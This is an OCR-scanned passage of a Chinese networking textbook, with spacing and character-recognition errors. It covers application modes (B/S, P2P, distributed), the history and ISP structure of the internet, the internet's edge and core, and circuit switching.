最 著名 的 浏览 器 之 一 是 Microsoft 公司 的 IE 浏览 器 ,通常 集成 在 操作 系统 产品 
Windows 当中 。 提 供 超 文 本 文档 服务 的 计算 机 构成 万 维 网 服务 器 (Web Server) ,以 由 网 
页 组 成 的 网 站 形式 向 客户 机 上 的 浏览 器 程序 提供 多 媒体 信息 访问 服务 。 

今天 ,浏览 器 /服务 器 (Browser/Server,B/S) 模 式 泛 指使 用 上 述 形式 运行 的 一 种 计算 
机 应 用 系统 的 工作 方式 。B/S 结构 应 用 模式 要 设置 Web 服务 器 ,用 户 在 客户 机 上 使 用 
Web 浏览 器 访问 服务 器 上 的 Web 网 页 ,通过 Web 网 页 交互 访问 后 方 的 数据 库 , 从 数据 库 
获取 处 理 的 信息 以 Web 网 页 上 的 文本 、 图 像 或 其 他 对 象 的 形式 展现 给 用 户 。 从 这 个 意义 
上 可 以 说 ,B/S 模式 是 C/S 模式 的 一 种 特别 延伸 。 

4. 对 等 模式 

对 等 模式 (Peer to Peer,P2P) 是 指 应 用 时 两 台 计 算 机 在 一 对 一 基础 上 平等 地 进行 通 
信 。 早 期 ,两 台 计 算 机 要 用 固定 的 线路 对 接 , 而 现在 可 以 在 网 络 上 建立 对 等 应 用 模式 。 

个 用 户 在 网 上 广播 他 的 要 求 ,响应 的 另 一 个 用 户 和 他 对 等 连接 ,信息 就 可 以 在 两 台 计 算 机 
之 间 传 送 。 信 息 下 载 业 务 多 使 用 这 种 应 用 模式 。 

5. 分 布 式 系统 

在 集中 式 系统 里 ,程序 和 数据 集中 在 一 台 功 能 或 强 或 弱 的 计算 机 当中 。 而 分 布 式 系 
统 在 逻辑 上 仍然 是 一 个 统一 的 系统 ,但 在 物理 上 ,系统 的 程序 和 数据 分 布 在 不 同 的 计算 机 
系统 里 。 

分 布 式 系统 必须 在 网 络 环境 上 构筑 ,但 不 能 认为 网 络 平台 上 的 应 用 系统 都 是 分 布 式 

。 分 布 式 系统 有 个 基本 特征 ,系统 包含 的 所 谓 * 全 局 访问 ?应 用 要 涉及 不 同 的 计算 机 系 
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统 资 源 , 但 全 局 访问 应 该 是 “透明 ”的 , 即 应 用 本 身 不 必 关 心 访问 目的 地 ,而 是 由 系统 负责 
把 访问 映射 到 某 台 计算 机 去 。 在 分 布 式 应 用 模式 中 ,一 个 处 理 任务 是 由 分 布 在 不 同 物理 
地 点 的 若干 个 计算 机 系统 共同 来 完成 的 。 为 此 ,要 配置 额外 的 软件 和 硬件 。 


1.4 本 章 小 结 


计算 机 是 一 个 以 数据 处 理 为 目标 的 系统 。 通 常 把 组 成 计算 机 系统 的 成 分 分 为 两 大 部 
分 : 计算 机 硬件 和 计算 机 软件 。 软 件 和 硬件 相辅相成 ,协同 完成 数据 处 理 过 程 。 硬 件 是 
软件 驻 留 和 执行 的 物质 基础 ,而 软件 体现 了 对 硬件 运行 动作 的 控制 和 协调 。 

冯 。 诺 依 曼 提出 : 程序 预先 存储 在 计算 机 内 部 ,运行 时 计算 机 自行 提取 程序 里 的 操 
作 指 令 执行 。 这 就 是 程序 存储 原理 ,是 人 类 控制 机 器 方式 的 革命 性 突破 。 以 程序 存储 原 
理 为 核心 的 汉 。 诺 依 曼 结构 体系 奠定 了 计算 机 的 标准 结构 ,沿用 至 今 。 

计算 机 应 用 系统 的 几 种 使 用 模式 是 集中 式 、.C/S 方式.B/S 方式 和 分 布 式 。 

随 着 互联 网 时 代 的 到 来 ,计算 机 的 重要 性 日 益 突出 , 它 不 仅 引 起 了 人 类 的 工作 与 生活 
方式 的 变化 ,同时 也 为 人 类 发 展 科 学 技术 、 创 造 文化 提供 了 新 的 手段 。 但 另 一 方面 ,信息 
安全 所 面临 的 挑战 也 日 益 突 出 ,主要 体现 在 恶意 代码 和 安全 攻击 等 方面 。 
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本 章 学 习 要 点 : 

如 互联 网 的 概念 ,组 成 互联 网 的 边缘 部 分 和 核心 部 分 及 其 作用 ; 

如 核心 网 络 中 分 组 交换 的 概念 ; 

如 计算 机 网 络 的 分 类 和 性 能 指标 ; 

名 计算 机 网 络 分 层次 的 体系 结构 (包含 协议 和 服务 ) ,特别 是 五 层 协议 。 


2.1 互联 网 的 发 展 


现在 人 们 的 生活 \、 工 作 、 学 习 和 交往 都 已 离 不 开 计算 机 网 络 。 设 想 某 一 天 计算 机 网 络 
突然 出 故障 不 能 工作 了 , 那 时 会 出 现 什 么 结果 呢 ? 这 时 ,我 们 将 无 法 购买 机 票 或 火车 票 ， 
因为 售票 员 无 法 知道 还 有 多 少 票 可 供出 售 ;我 们 也 无 法 到 银行 存 钱 或 取 钱 ,无 法 交纳 水 电 
费 和 煤气 费 等 ;股市 交易 都 将 停顿 ;在 图 书馆 也 无 法 检索 到 所 需要 的 图 书 和 资料 等 。 网 络 
出 故障 后 , 既 不 能 上 网 查询 有 关 的 资料 ,也 无 法 使 用 电子 邮件 和 朋友 及 时 交流 信息 。 总 
之 ,这 时 的 社会 将 会 是 一 片 混乱 。 

计算 机 网 络 也 是 向 广大 用 户 提供 休闲 娱乐 的 场所 。 例 如 ,计算 机 网 络 可 以 向 用 户 提 
供 多 种 音频 和 视频 的 节目 。 用 户 可 以 利用 鼠标 随时 点 击 各 种 在 线 节目 。 计 算 机 网 络 还 可 
提供 一 对 一 或 多 对 多 的 网 上 聊天 (包括 视频 图 像 的 传送 ) 的 服务 。 计 算 机 网 络 提 供 的 网 络 
游戏 已 经 成 为 许多 人 非常 喜爱 的 一 种 娱乐 方式 。 

当然 ,计算 机 网 络 也 给 人 们 带 来 了 一 些 负 面 影响 。 有 人 肆意 利用 网 络 传播 计算 机 病 
毒 , 破 坏 计 算 机 网 络 上 数据 的 正常 传送 和 交换 。 有 的 犯罪 分 子 甚至 利用 计算 机 网 络 窃取 
国家 机 密 和 盗窃 银行 或 储户 的 钱财 。 网 上 欺诈 或 在 网 上 肆意 散布 不 良 信 息 和 播放 不 健康 
的 视频 节目 也 时 有 发 生 。 有 的 青少年 弃 学 而 沉 涡 于 网 吧 的 网 络 游戏 中 ,等 等 。 

虽然 如 此 ,计算 机 网 络 给 社会 带 来 的 积极 作用 仍然 是 主要 的 。 现 在 互联 网 已 成 为 全 
球 性 的 信息 基础 结构 的 雏形 。 全 世界 所 有 的 工业 发 达 国 家 和 许多 发 展 中 国家 都 纷纷 研究 
和 制定 本 国 建设 信息 基础 结构 的 计划 。 这 就 使 得 计算 机 网 络 的 发 展 进 入 了 一 个 新 的 历史 
阶段 , 变 成 了 几乎 人 人 都 知道 而 且 都 十 分 关心 的 热门 学 科 。 

由 于 互联 网 已 经 成 为 世界 上 最 大 的 计算 机 网 络 , 因 此 下 面 先 简单 介绍 什么 是 互联 网 ， 
同时 也 介绍 互联 网 的 主要 构件 ,这 样 就 可 以 对 计算 机 网 络 有 一 个 初步 的 了 解 。 


211 互联 网 概述 
起 源 于 美国 的 Internet 现 已 发 展 成 为 世界 上 最 大 的 国际 性 计算 机 互联 网 。 我 们 先 给 
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出 关于 网 络 .互联 网 (互连网 ) 的 一 些 最 基本 的 概念 。 


网 络 (network) 由 若干 结 点 (node) 和 连接 这 些 结 点 的 链 路 (link) 组 成 。 网 络 中 的 结 
点 可 以 是 计算 机 、 集 线 器、 交换机 或 路 由 器 等 设备 。 图 2-1(a) 给 出 了 一 个 具有 四 个 结 点 和 
三 条 链 路 的 网 络 。 我 们 看 到 ,有 三 台 计 算 机 通过 三 条 链 路 连接 到 一 个 集线器 上 ,构成 了 一 
个 简单 的 网 络 。 在 很 多 情况 下 ,我 们 可 以 用 一 条 云 表 示 一 个 网 络 。 这 样 做 的 好 处 是 可 以 
不 去 关心 网 络 中 的 细节 问题 ,因而 可 以 集中 精力 研究 涉及 与 网 络 互 连 有 关 的 一 些 问 题 。 
网 络 互联 网 (网 络 的 网 络 ) 


(a) 简单 的 网 络 (b) 由 网 络 构成 的 互联 网 
图 2-1 网 络 结构 


网 络 和 网 络 还 可 以 通过 路 由 器 互 连 起 来 ,这 样 就 构成 了 一 个 覆盖 范围 更 大 的 网 络 , 即 
互联 网 (或 互连网 ), 如 图 2-1(b) 所 示 。 因 此 互联 网 是 “网 络 的 网 络 ”(network of 
networks) 。 

互联 网 是 世界 上 最 大 的 互连网 络 ( 用 户 数 以 亿 计 , 互 连 的 网 络 数 以 百 万 计 )。 习 惯 上 ， 
大 家 把 连接 在 互联 网 上 的 计算 机 都 称 为 主机 (host)。 互 联网 也 常常 用 一 朱云 来 表示 ,这 
种 表示 方法 是 把 主机 画 在 网 络 的 外 边 ,而 网 络 内 部 的 细节 , 即 路 由 器 怎样 把 许多 网 络 连 接 
起 来 往往 就 省 略 了 。 因 此 ,我们 可 以 初步 建立 这 样 的 基本 概念 : 网 络 把 许多 计算 机 连接 
在 一 起 ,而 互联 网 则 把 许多 网 络 连 接 在 一 起 。 

还 有 一 点 也 必须 注意 ,就 是 网 络 互 连 并 不 是 把 计算 机 仅仅 简单 地 在 物理 上 连接 起 来 ， 
因为 这 样 做 并 不 能 达到 计算 机 之 间 能 够 相互 交换 信息 的 目的 。 还 必须 在 计算 机 上 安装 许 
多 使 计算 机 能 够 交换 信息 的 软件 才 行 。 因 此 当 谈 到 网 络 互 连 时 ,就 隐 含 地 表示 在 这 些 计 
算 机 上 已 经 安装 了 适当 的 软件 ,因而 在 计算 机 之 间 可 以 通过 网 络 交换 信息 。 

最 后 要 说 明 一 下 ,上 面 所 说 的 网 络 中 一 定 有 计算 机 。 没 有 人 会 仅仅 把 几 个 路 由 器 用 
链 路 连接 起 来 ,构成 一 个 无 用 的 “网 络 ”。 因 此 ,这 里 所 谈 到 的 网 络 都 是 包含 有 计算 机 的 网 
络 。 像 这 样 包 含有 计算 机 的 网 络 , 以 及 用 这 样 的 网 络 加 上 许多 路 由 器 组 成 的 互联 网 ,都 可 
通称 为 计算 机 网 络 。 当 然 ,世界 上 最 大 的 互联 网 也 是 一 种 计算 机 网 络 。 

互联 网 的 基础 结构 大 体 上 经 历 了 三 个 阶段 的 演进 。 但 这 三 个 阶段 在 时 间 划 分 上 并 非 
截然 分 开 而 是 有 部 分 重 释 的 ,这 是 因为 网 络 的 演进 是 逐渐 的 而 不 是 在 某 个 日 期 突然 发 生 
了 变化 。 

第 一 阶段 是 从 单个 网 络 ARPANET 向 互联 网 发 展 的 过 程 。1969 年 ,美国 国防 部 创 
建 的 第 一 个 分 组 交换 网 ARPANET 最 初 只 是 一 个 单个 的 分 组 交换 网 (并 不 是 一 个 互 连 的 
网 络 ) 。 所 有 要 连接 在 ARPANET 上 的 主机 都 直接 与 就 近 的 结 点 交换 机 相连 。 但 到 了 
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20 世纪 70 年 代 中 期 ,人 们 已 认识 到 不 可 能 仅 使 用 一 个 单独 的 网 络 来 满足 所 有 的 通信 问 
题 。 于 是 ARPA 开始 研究 多 种 网 络 ( 如 分 组 无 线 电 网 络 ) 互 连 的 技术 ,这 就 导致 后 来 互 连 
网 的 出 现 。 这 样 的 互连网 就 成 为 现在 互联 网 的 稚 形 。1983 年 TCP/IP 协议 成 为 
ARPANET 上 的 标准 协议 ,使 得 所 有 使 用 TCP/IP 协议 的 计算 机 都 能 利用 互联 网 相互 通 
信 , 因 而 人 们 就 把 1983 年 作为 互联 网 的 诞生 时 间 。1990 年 ARPANET 正式 宣布 关闭 ， 
因为 它 的 实验 任务 已 经 完成 。 

第 二 阶段 的 特点 是 建成 了 三 级 结构 的 互联 网 。 从 1985 年 起 ,美国 国家 科学 基金 会 
(National Science Foundation,NSF) 就 围绕 六 个 大 型 计算 机 中 心 建设 计算 机 网 络 , 即 国 
家 科学 基金 网 NSFNET。 它 是 一 个 三 级 计算 机 网 络 ,分 为 主干 网 .地 区 网 和 校园 网 (或 企 
业 网 ) 。 这 种 三 级 计算 机 网 络 覆盖 了 全 美国 主要 的 大 学 和 研究 所 ,并 且 成 为 互联 网 中 的 主 
要 组 成 部 分 。1991 年 ,NSF 和 美国 的 其 他 政府 机 构 开 始 认识 到 ,互联 网 必 将 扩大 其 使 用 
范围 ,不 应 仅 限 于 大 学 和 研究 机 构 。 世 界 上 的 许多 公司 纷纷 接 人 到 互联 网 ,使 网 络 上 的 通 
信 量 急剧 增 大 ,使 互联 网 的 容量 已 满足 不 了 需要 。 于 是 美国 政府 决定 将 互联 网 的 主干 网 
转交 给 私人 公司 来 经 营 , 并 开始 对 接 人 互联 网 的 单位 收费 。1992 年 互联 网 上 的 主机 超过 
100 万 台 。1993 年 互联 网 主干 网 的 速率 提高 到 45Mb/s(T3 速率 ) 。 

第 三 阶段 的 特点 是 逐渐 形成 了 多 层次 ISP 结构 的 互联 网 。 从 1993 年 开始 ,由 美国 政 
府 资助 的 NSFNET 逐渐 被 若干 个 商用 的 互联 网 主干 网 替代 ,而 政府 机 构 不 再 负责 互联 
网 的 运营 。 这 样 就 出 现 了 一 个 新 的 名 词 : 互联 网 服务 提供 者 (Internet Service Provider， 
ISP) 。 在 许多 情况 下 ,互联 网 服务 提供 者 ISP 就 是 一 个 进行 商业 活动 的 公司 ,因此 ISP 又 
常 译 为 互联 网 服务 提供 商 。 

ISP 拥有 从 互联 网 管理 机 构 申 请 到 的 多 个 IP 地 址 (互联 网 上 的 主机 都 必须 有 IP 地 
址 才能 进行 通信 ) ,同时 拥有 通信 线路 (大 的 ISP 自己 建造 通信 线路 ,小 的 ISP 则 向 电信 公 
司 租用 通信 线路 ) 以 及 路 由 器 等 连 网 设备 ,因此 任何 机 构 和 个 人 只 要 向 ISP 交纳 规定 的 费 
用 ,就 可 从 ISP 得 到 所 需 的 IP 地 址 ,并 通过 该 ISP 接 入 到 互联 网 。 我 们 通常 所 说 的 “上 
网 ”就 是 指 “( 通 过 某 个 ISP) 接 和 人 到 互联 网 ”。 因 为 ISP 向 连接 到 互联 网 的 用 户 提 供 了 IP 
地 址 。IP 地 址 的 管理 机 构 不 会 把 一 个 单个 的 IP 地 址 分 配给 单个 用 户 ( 不 “零售 "IP 地 
址 ) ,而 是 把 一 批 IP 地 址 有 偿 分 配给 经 审查 合格 的 ISP( 只 “批发 "IP 地 址 )。 从 以 上 内 容 
可 以 看 出 ,现在 的 互联 网 已 不 是 某 个 单个 组 织 所 拥有 ,而 是 全 世界 无 数 大 大 小 小 的 ISP 共 
同 拥 有 的 。 图 2-2 说 明了 用 户 上 网 与 ISP 的 关系 。 


互联 网 
服务 提供 者 


图 2-2 用 户 通 过 ISP 接 入 互联 网 
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根据 提供 服务 的 覆盖 面积 大 小 以 及 所 拥有 的 IP 地 址 数目 的 不 同 ,ISP 也 分 成 为 不 同 
的 层次 : 主干 ISP、 地 区 ISP 和 本 地 ISP。 

主干 ISP 由 几 个 专门 的 公司 创建 和 维持 ,服务 面积 最 大 (一 般 都 能 够 覆盖 国家 范围 )， 
并 且 还 接 有 高 速 主干 网 (例如 10Gb/s 或 更 高 )。 有 一 些 地 区 ISP 网 络 也 可 直接 与 主干 
ISP 相连 。 

地 区 ISP 是 一 些 较 小 的 ISP。 这 些 地 区 ISP 通过 一 个 或 多 个 主干 ISP 连接 起 来 。 它 
们 位 于 等 级 中 的 第 二 层 , 数 据 率 也 低 一 些 。 

本 地 ISP 给 终端 用 户 提 供 直接 的 服务 。 本 地 ISP 可 以 连接 到 地 区 ISP, 也 可 直接 连 
接 到 主干 ISP。 绝 大 多 数 的 终端 用 户 都 是 连接 到 本 地 ISP 的 。 本 地 ISP 可 以 是 一 个 仅仅 
提供 互联 网 服务 的 公司 ,也 可 以 是 一 个 拥有 网 络 并 向 自己 的 雇员 提供 服务 的 企业 ,或 者 是 
一 个 运行 自己 的 网 的 非 营利 机 构 ( 如 学 院 或 大 学 ) 。 本 地 ISP 可 以 与 地 区 ISP 或 主干 ISP 
连接 。 

图 2-3 是 具有 三 层 ISP 结构 的 互联 网 的 概念 示意 图 ,但 这 种 示意 图 并 不 表示 各 ISP 
的 地 理 位 置 关 系 。 图 中 给 出 了 主机 A 经 过 许多 不 同 层次 的 ISP 与 主机 也 通信 的 示意 图 。 


图 2-3 基于 ISP 的 多 层 结构 的 互联 网 示意 图 


从 原理 上 讲 , 只 要 每 一 个 本 地 ISP 都 安装 了 路 由 器 连接 到 某 个 地 区 ISP, 而 每 一 个 地 
区 ISP 也 有 路 由 器 连接 到 主干 ISP, 那 么 在 这 些 相互 连接 的 ISP 的 共同 合作 下 ,就 可 以 完 
成 互联 网 中 的 所 有 的 分 组 转发 任务 。 但 随 着 互联 网 上 数据 流量 的 急剧 增长 ,人 们 开始 研 
究 如 何 更 快 地 转发 分 组 ,以 及 如 何 更 加 有 效 地 利用 网 络 资源 。 于 是 ,互联 网 交换 点 
(Internet eXchange Point,IXP) 就 应 运 而 生 了 。 

IXP 的 主要 作用 就 是 允许 两 个 网 络 直接 相连 并 交换 分 组 , 而 不 需要 再 通过 第 三 个 网 
络 来 转发 分 组 。 例 如 ,在 图 2-3 中 右 方 的 两 个 地 区 ISP 通过 一 个 IXP 连接 起 来 了 。 这 样 ， 
主机 A 和 主机 B 交换 分 组 时 ,就 不 必 再 经 过 最 上 层 的 主干 ISP, 而 是 直接 在 两 个 地 区 ISP 
之 间 用 高 速 链 路 对 等 地 交换 分 组 。 这 样 就 使 互联 网 上 的 数据 流量 分 布 更 加 合理 ,同时 也 
减少 了 分 组 转发 的 迟延 时 间 ,降低 了 分 组 转发 的 费用 。 现 在 许多 IXP 在 进行 对 等 交换 分 
组 时 ,都 互相 不 收费 。 但 本 地 ISP 或 地 区 ISP 通过 IXP 向 高 层 的 IXP 转发 分 组 时 , 则 需 
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交纳 一 定 的 费用 。IXP 的 结构 非常 复杂 。 典 型 的 IXP 由 一 个 或 多 个 网 络 交 换 机 组 成 , 许 
多 ISP 再 连接 到 这 些 网 络 交换 机 的 相关 端口 上 。IXP 常 采 用 工作 在 数据 链 路 层 的 网 络 交 
换 机 。 这 些 网 络 交换 机 都 用 局 域 网 互 连 起 来 。 

顺便 指出 ,一旦 某 个 用 户 能 够 接 入 到 互联 网 ,那么 他 就 能 够 成 为 一 个 ISP。 他 需要 做 
的 就 是 购买 一 些 如 调制 解 调 器 或 路 由 器 这 样 的 设备 ,让 其 他 用 户 能 够 和 他 相连 接 。 

互联 网 已 经 成 为 世界 上 规模 最 大 和 增长 速率 最 快 的 计算 机 网 络 ,没有 人 能 够 准确 说 
出 互联 网 究竟 有 多 大 。 互 联网 的 迅猛 发 展 始 于 20 世纪 90 年 代 。 由 欧洲 原子 核 研究 组 织 
CERN 开发 的 万 维 网 (World Wide Web, WWW) 被 广泛 使 用 在 互联 网 上 ,大 大 方便 了 广 
大 非 网 络 专业 人 员 对 网 络 的 使 用 ,成 为 互联 网 的 这 种 指数 级 增长 的 主要 驱动 力 。 万 维 网 
的 站 点 数目 也 急剧 增长 。 在 互联 网 上 的 数据 通信 量 每 月 约 增加 10%。2014 年 ,全 世界 的 
互联 网 用 户 数 已 达到 了 30 亿 人 。 

由 于 互联 网 存在 着 技术 上 和 功能 上 的 不 足 , 加 上 用 户 数量 猛 增 ,使 得 现 有 的 互联 网 不 
堪 重 负 。 因 此 1996 年 美国 的 一 些 研 究 机 构 向 34 所 大 学 提出 研制 和 建造 新 一 代 互 联网 的 
设想 ,并 宣布 在 今后 5 年 内 用 5 亿美 元 的 联邦 资金 实施 “下 一 代 互联 网 计划 ”, 即 “NGI 计 
划 ”(Next Generation Internet Initiative)。NGI 计划 要 实现 的 主要 目标 是 : 

(1) 开发 下 一 代 网 络 结构 ,以 比 现 有 的 互联 网 高 100 倍 的 速率 连接 至 少 100 个 研究 
机 构 , 以 比 现 有 的 互联 网 高 1000 倍 的 速率 连接 10 个 类 似 的 网 点 。 其 端 到 端的 传输 速率 
要 超过 100Mb/s 至 10Gb/s。 

(2) 使 用 更 加 先进 的 网 络 服务 技术 和 开发 许多 带 有 革命 性 的 应 用 ,如 远程 医疗 .远程 
教育 ,有 关 能 源 和 地 球 系统 的 研究 ` 高 性 能 的 全 球 通信 、 环 境 监测 和 预报 .紧急 情况 处 
理 等 。 

(3) 使 用 超 高 速 全 光 网 络 ,能 实现 更 快速 的 交换 和 路 由 选择 ,同时 具有 为 一 些 实 时 应 
用 保留 带宽 的 能 力 。 

(4) 对 整个 互联 网 的 管理 和 保证 信息 的 可 靠 性 及 安全 性 方面 进行 较 大 的 改进 。 
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互联 网 的 拓扑 结构 虽然 非常 复杂 ,并 且 在 地 理 上 覆盖 了 全 球 ,但 从 其 工作 方式 上 看 ， 
可 以 划分 为 以 下 两 大 块 : 

(1) 边缘 部 分 : 由 所 有 连接 在 互联 网 上 的 主机 组 成 。 这 部 分 是 用 户 直接 使 用 的 ,用 
来 进行 通信 (传送 数据 、 音 频 或 视频 ) 和 资源 共享 。 

(2) 核心 部 分 : 由 大 量 网 络 和 连接 这 些 网 络 的 路 由 器 组 成 。 这 部 分 是 为 边缘 部 分 提 
供 服务 的 (提供 连通 性 和 交换 ) 。 

如 图 2-4 所 示 , 给 出 了 这 两 部 分 的 示意 图 。 下 面 分 别 讨论 这 两 部 分 的 作用 和 工作 
方式 。 

1. 互联 网 的 边缘 部 分 

处 在 互联 网 边缘 的 部 分 就 是 连接 在 互联 网 上 的 所 有 的 主机 。 这 些 主机 又 称 为 端 系统 
(end system),“ 端 "就 是 “末端 "的 意思 。 端 系统 在 功能 上 可 能 有 很 大 的 差别 ,小 的 端 系 统 
可 以 是 一 台 普 通 个 人 计算 机 甚至 是 很 小 的 掌上 电脑 ,而 大 的 端 系统 则 可 以 是 一 台 非 常 昂 
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图 2-4 互联 网 的 边缘 部 分 与 核心 部 分 


贵 的 大 型 计算 机 。 端 系统 的 拥有 者 可 以 是 个 人 ,也 可 以 是 单位 (如 学 校 , 企 业 、 政 府 机 关 
等 ) ,当然 也 可 以 是 某 个 ISP( 即 ISP 不 仅仅 是 向 端 系统 提供 服务 , 它 也 可 以 拥有 一 些 端 系 
统 )。 边 缘 部 分 利用 核心 部 分 所 提供 的 服务 ,使 众多 主机 之 间 能 够 互相 通信 并 交换 或 共享 
信息 。 

我 们 先 要 明确 下 面 的 概念 。 我 们 说 :“ 主 机 A 和 主机 B 进行 通信 ”, 实 际 上 是 指 :“ 运 
行 在 主机 A 上 的 某 个 程序 和 运行 在 主机 B 上 的 另 一 个 程序 进行 通信 ”。 由 于 “进程 "就 是 
运行 着 的 程序 ”, 因 此 这 也 就 是 指 :“ 主 机 A 的 某 个 进程 和 主机 B 上 的 另 一 个 进程 进行 
通信 ”。 这 种 比较 严密 的 说 法 通常 可 以 简称 为 “计算 机 之 间 通 信 ”。 

在 网 络 边缘 的 端 系统 中 运行 的 程序 之 间 的 通信 方式 通常 可 划分 为 两 大 类 : 客户 - 服 
务 器 方式 (C/S 方式 ) 和 对 等 方式 (P2P 方式 )。 下 面 分 别 对 这 两 种 方式 进行 介绍 。 

1) 客户 -服务 器 方式 

客户 -服务 器 方式 在 互联 网 上 是 最 常用 的 ,也 是 传统 的 方式 。 我 们 在 上 网 发 送 电 子 邮 
件 或 在 网 站 上 查找 资料 时 ,都 是 使 用 客户 -服务 器 方式 (有 时 写 为 客户 /服务 器 方式 ) 。 

我 们 知道 , 当 我 们 打 电 话 时 ,电话 机 的 振 铃声 使 被 叫 用 户 知道 现在 有 一 个 电话 呼叫 。 
计算 机 通信 的 对 象 是 应 用 层 中 的 应 用 进程 ,显然 不 能 用 响 铃 的 办 法 来 通知 所 要 找 的 对 方 
的 应 用 进程 。 然 而 采用 客户 服务 器 方式 可 以 使 两 个 应 用 进程 能 够 进行 通信 。 

客户 (client) 和 服务 器 (server) 都 是 指 通 信 中 所 涉及 的 两 个 应 用 进程 。 客 户 -服务 器 
方式 所 描述 的 是 进程 之 间 服 务 和 被 服务 的 关系 。 如 图 2-5 所 示 , 主 机 A 运行 客户 程序 而 
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图 2-5 客户 -服务 器 工作 方式 
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主机 B 运行 服务 器 程序 。 在 这 种 情况 下 ,A 是 客户 而 B 是 服务 器 。 客 户 A 向 服务 器 BB 发 
出 请 求 服务 ,而 服务 器 B 向 客户 A 提供 服务 。 这 里 最 主要 的 特征 就 是 : 客户 是 服务 请 求 
方 ,服务 器 是 服务 提供 方 。 

在 实际 应 用 中 ,客户 程序 和 服务 器 程序 通常 还 具有 以 下 一 些 主 要 特点 。 

客户 程序 的 主要 特点 如 下 : 

(1) 被 用 户 调用 后 运行 ,在 通信 时 主动 向 远 地 服 务 器 发 起 通信 (请 求 服务 )。 因 此 , 客 
户 程 序 必须 知道 服务 器 程序 的 地 址 。 

(2) 不 需要 特殊 的 硬件 和 很 复杂 的 操作 系统 。 

服务 器 程序 的 主要 特点 如 下 : 

(1) 它 是 一 种 专门 用 来 提供 某 种 服务 的 程序 ,可 同时 处 理 多 个 远 地 或 本 地 客户 的 请 求 。 

(2) 系统 启动 后 即 自动 调用 并 一 直 不 断 地 运行 着 ,被 动 地 等 待 并 接受 来 自 各 地 的 客 
户 的 通信 请 求 。 因 此 ,服务 器 程序 不 需要 知道 客户 程序 的 地 址 。 

(3) 一 般 需要 强大 的 硬件 和 高 级 的 操作 系统 支持 。 

客户 与 服务 器 的 通信 关系 建立 后 ,通信 可 以 是 双向 的 ,客户 和 服务 器 都 可 发 送 和 接收 
数据 。 

2) 对 等 连接 方式 

对 等 连接 (peer-to-peer,P2P) 是 指 两 个 主机 在 通信 时 并 不 区 分 哪 一 个 是 服务 请 求 方 
还 是 服务 提供 方 。 只 要 两 个 主机 都 运行 了 对 等 连接 软件 (P2P 软件 ) ,它们 就 可 以 进行 平 
等 的 .对 等 连接 通信 。 这 时 ,双方 都 可 以 下 载 对 方 已 经 存储 在 硬盘 中 的 共享 文档 。 因 此 这 
种 工作 方式 也 称 为 P2P 文件 共享 。 在 图 2-6 中 ,主机 C.D、E 和 下 都 运行 了 P2P 软件 , 因 
此 这 几 个 主机 都 可 进行 对 等 通信 (如 C 和 D,E 和 下 ,以 及 C 和 下 )。 实 际 上 ,对 等 连接 方 
式 从 本 质 上 看 仍然 是 使 用 客户 -服务 器 方式 ,只 是 对 等 连接 中 的 每 一 个 主机 既是 客户 也 同 
时 是 服务 器 。 例 如 主机 C, 当 C 请 求 D 的 服务 时 ,C 是 客户 ,D 是 服务 器 。 但 如 果 C 又 同 
时 向 下 提供 服务 ,那么 C 又 同时 起 着 服务 器 的 作用 。 对 等 连接 工作 方式 可 支持 大 量 对 等 
用 户 ( 如 上 百 万 个 ) 同 时 工作 。 


运行 : 
P2P 程 序 网 络 边缘 P2P 程 序 


运行 


P2P 程 序 


2-6 ”对 等 连接 工作 方式 


2. 互联 网 的 核心 部 分 
网 络 核心 部 分 是 互联 网 中 最 复杂 的 部 分 ,因为 网 络 中 的 核心 部 分 要 向 网 络 边缘 中 的 
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大 量 主机 提供 连通 性 ,使 边缘 部 分 中 的 任何 一 个 主机 都 能 够 向 其 他 主机 通信 ( 即 传送 或 接 
收 各 种 形式 的 数据 ) 。 

在 网 络 核心 部 分 起 特殊 作用 的 是 路 由 器 (router)。 目 前 我 们 只 需要 知道 ,路 由 器 是 
一 种 专用 计算 机 (但 不 是 主机 ) 。 如 果 没 有 路 由 器 ,再 多 的 网 络 也 无 法 构建 成 互联 网 。 路 
由 器 是 实现 分 组 交换 (packet switching) 的 关键 构件 ,其 任务 是 转发 收 到 的 分 组 ,这 是 网 
络 核心 部 分 最 重要 的 功能 。 为 了 和 弄 清 分 组 交换 ,我 们 先 介绍 电路 交换 的 基本 概念 ,在 此 基 
础 之 上 再 讨论 分 组 交换 的 特点 。 

1) 电路 交换 的 主要 特点 

在 电话 问世 后 不 久 , 人 们 就 发 现 , 要 让 所 有 的 电话 机 都 两 两 相连 接 是 不 现实 的 。 两 部 
电话 只 需要 用 一 对 电线 就 能 够 互相 连接 起 来 。 但 若 有 5 部 电话 要 两 两 相连 , 则 需要 10 对 
电线 。 显 然 , 若 N 部 电话 要 两 两 相连 ,就 需要 NCN 一 1)/2 对 电线 。 当 电话 机 的 数量 很 大 
时 ,这 种 连接 方法 需要 的 电线 数量 就 太 大 了 (与 电话 机 的 数量 的 平方 成 正比 )。 于 是 人 们 
认识 到 ,要 使 得 每 一 部 电话 能 够 很 方便 地 和 另 一 部 电话 进行 通信 ,就 应 当 使 用 电话 交换 机 
将 这 些 电 话 连接 起 来 。 每 一 部 电话 都 连接 到 交换 机 上 ,而 交换 机 使 用 交换 的 方法 ,让 电话 
用 户 彼 此 之 间 可 以 很 方便 地 通信 。 一 百 多 年 来 ,电话 交换 机 虽然 经 过 多 次 更 新 换代 ,但 交 
换 的 方式 一 直 都 是 电路 交换 (circuit switching) 。 

当 电话 机 的 数量 增多 时 ,就 要 使 用 很 多 彼此 连接 起 来 的 交换 机 来 完成 全 网 的 交换 任 
务 。 用 这 样 的 方法 ,就 构成 了 覆盖 全 世界 的 电信 网 。 

从 通信 资源 的 分 配角 度 来 看 ,交换 ”(switching) 就 是 按照 某 种 方式 动态 地 分 配 传输 
线路 的 资源 。 在 使 用 电路 交换 打 电 话 之 前 ,必须 先 拨号 建立 连接 。 当 拨号 的 信 令 通过 许 
多 交换 机 到 达 被 叫 用 户 所 连接 的 交换 机 时 ,该 交换 机 就 向 被 叫 用 户 的 电话 机 振 铃 。 在 被 
叫 用 户 摘 机 且 摘 机 信 令 传送 回 到 主 叫 用 户 所 连接 的 交换 机 后 ,呼叫 即 完成 。 这 时 ,从 主 叫 
端 到 被 叫 端 就 建立 了 一 条 连接 (物理 通路 )。 这 条 连接 占用 了 双方 通话 时 所 需 的 通信 资 
源 ,而 这 些 资 源 在 双方 通信 时 不 会 被 其 他 用 户 占用 ,此 后 主 叫 和 被 叫 双 方才 能 互相 通电 
话 。 正 是 因为 有 了 这 个 特点 ,电路 交换 对 端 到 端的 通信 质量 有 可 靠 的 保证 。 通 话 完 毕 挂 
